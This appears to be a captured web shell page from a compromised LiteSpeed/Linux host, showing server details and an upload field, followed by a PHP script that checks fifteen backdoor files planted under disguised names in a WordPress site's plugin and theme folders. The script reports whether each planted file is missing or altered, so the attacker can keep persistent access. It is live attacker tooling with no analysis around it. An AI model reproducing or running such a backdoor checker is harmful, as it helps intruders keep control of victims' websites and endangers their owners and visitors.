|
Server : LiteSpeed System : Linux host 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64 User : idnco5810 ( 1093) PHP Version : 8.2.29 Disable Function : NONE Directory : /dev/shm/ |
Upload File : |
<?php $r = '/home/monas88.com/public_html'; $x = ["/wp-content/plugins/security_1766634408/error_404_1766634409.php"=>"bd@@22021@@741",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Dom/Document/Filter/linkasito.php"=>"bd@@42757@@971",
"/wp-content/themes/merah/inc/builder/type/header/button/dynamic-css/index.initial.php"=>"bd@@71718@@916",
"/wp-content/themes/merah/inc/builder/type/footer/menu/dynamic-css/ucp.bak.php"=>"bd@@96045@@981",
"/wp-content/themes/merah/inc/builder/type/header/widget/dynamic-css/album_cat.php"=>"bd@@44596@@811",
"/wp-content/themes/merah/inc/builder/type/header/account/dynamic-css/tableform.php"=>"bd@@73788@@996",
"/wp-content/themes/merah/inc/builder/type/footer/social-icon/class.astra.footer.social.icons.component.loader.php"=>"bd@@97606@@909",
"/wp-content/themes/merah/inc/customizer/configurations/builder/base/class.astra.html.icon.component.php"=>"bd@@49771@@931",
"/wp-content/themes/merah/inc/compatibility/lifterlms/customizer/sections/layout/class.astra.lifter.general.configs.php"=>"bd@@97141@@1036",
"/wp-content/themes/merah/inc/builder/type/footer/button/dynamic-css/go.php"=>"bd@@70813@@934",
"/wp-content/themes/merah/inc/builder/type/header/below-header/dynamic-css/common.php"=>"bd@@96682@@1067",
"/wp-content/themes/merah/inc/builder/type/header/button/class.astra.header.button.component.loader.php"=>"bd@@48849@@966",
"/wp-content/themes/merah/inc/builder/type/header/primary-header/dynamic-css/rt_styleloader.php"=>"bd@@96480@@1074",
"/wp-content/themes/merah/inc/builder/type/footer/menu/class.astra.footer.menu.component.loader.php"=>"bd@@46577@@933",
"/wp-content/themes/merah/inc/builder/type/header/edd-cart/dynamic-css/notification.php"=>"bd@@72698@@1066"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');